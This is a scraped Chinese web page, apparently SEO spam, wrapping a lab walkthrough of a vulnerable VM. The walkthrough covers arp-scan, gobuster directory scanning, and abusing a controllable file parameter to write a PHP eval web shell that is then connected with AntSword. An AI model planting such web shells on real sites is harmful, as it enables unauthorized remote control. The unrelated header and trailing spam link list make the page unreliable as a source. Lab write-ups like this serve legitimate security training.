当前位置: 首页 > news >正文

学校门户网站开发wordpress 数据库连接字符串

学校门户网站开发,wordpress 数据库连接字符串,wordpress搭建cms,制作网站的步骤是什么将这一关的镜像导入虚拟机,出现以下页面表示导入成功 以root身份打开kali终端,输入以下命令,查看靶机ip arp-scan -l 根据得到的靶机ip,浏览器访问进入环境 我们从当前页面没有得到有用的信息,尝试扫描后台 发现有一个…

将这一关的镜像导入虚拟机,出现以下页面表示导入成功

以root身份打开kali终端,输入以下命令,查看靶机ip

arp-scan -l

根据得到的靶机ip,浏览器访问进入环境

我们从当前页面没有得到有用的信息,尝试扫描后台

发现有一个后台目录文件robots.txt,尝试访问

没有得到有用的信息,尝试端口扫描

分别访问这几个端口,也没有什么发现,我们换个思路

还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典

cd /usr/share/wordlists/dirbuster/
ls -al

gobuster dir -u http://192.168.164.147/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

提示没有安装gobuster(颜色没变)

先更新apt,再安装gobuster

apt update  

apt install gobuster

运行gobuster查看是否安装成功

再次执行上面的那条命令

尝试后缀名拼接到ip后面访问

在输入框中随便输入,发现输入的数据被显示到页面上,抓包

发现网站会将提交的内容追加到graffiti.txt文件中,由于file参数是可控的,那么我们可以修改文件名改变文件上传的路径,尝试上传一句话木马到1.php中

<?php @eval($_POST[a]);?>

浏览器访问1.php

蚁剑连接

测试连接成功,添加,成功获取权限

http://www.yayakq.cn/news/592895/

相关文章:

  • html5结构的网站当年的51网站
  • 东莞清洁服务网站建设高端h5网站
  • 珠海做网站哪家好我自己做的网站打开很慢
  • 滨江区高端网站建设360软件商店
  • 检测网站的seo效果电子商务网站建设策划方案
  • 长春哪里有做网站的网站改版费用
  • 怎么在网站上做充话费业务0791网站建设
  • 纺织行业网站怎么做吸引人wordpress ping通告
  • wordpress建站 外贸wordpress主题zmovie
  • wordpress添加全屏广告seo推广的特点
  • 自动生成海报的网站网站建设服务 行业代码
  • 哈尔滨服务最好的网站优化公司沙洋建设局网站
  • 深圳市做网站的公司国内免费网站服务器推荐
  • 朋友找做网站都要收定金公司名称标志设计
  • 注册网站流程东莞整站优化
  • wordpress ie兼容seo网站推广服务
  • 网站上线之前怎么做推广廊坊百度推广电话
  • 哪个公司做网站好苏州可以做英语题的网站
  • 什么网站做3d模型能赚钱深圳网站搭建费用
  • 树莓派做网站服务器性能怎么样有必要花钱学视频剪辑吗
  • 柳州做网站人员网站安装出现dir
  • flash布局 的优秀网站西安电子商务网站建设
  • php网站开发教材百度一下你就知道下
  • 中小企业网站该怎么做中文手机编程软件app
  • 自己做网站网站seo比较好的优化方法
  • wordpress 关闭 ssl关键词排名优化公司
  • 深圳微商城网站制作公司合肥新闻 今天 最新消息
  • 南昌做网站公司哪家好重庆人才招聘网官网
  • 石家庄站规模手机收费网页制作
  • 拿p5.js做的网站wordpress自定义链接后404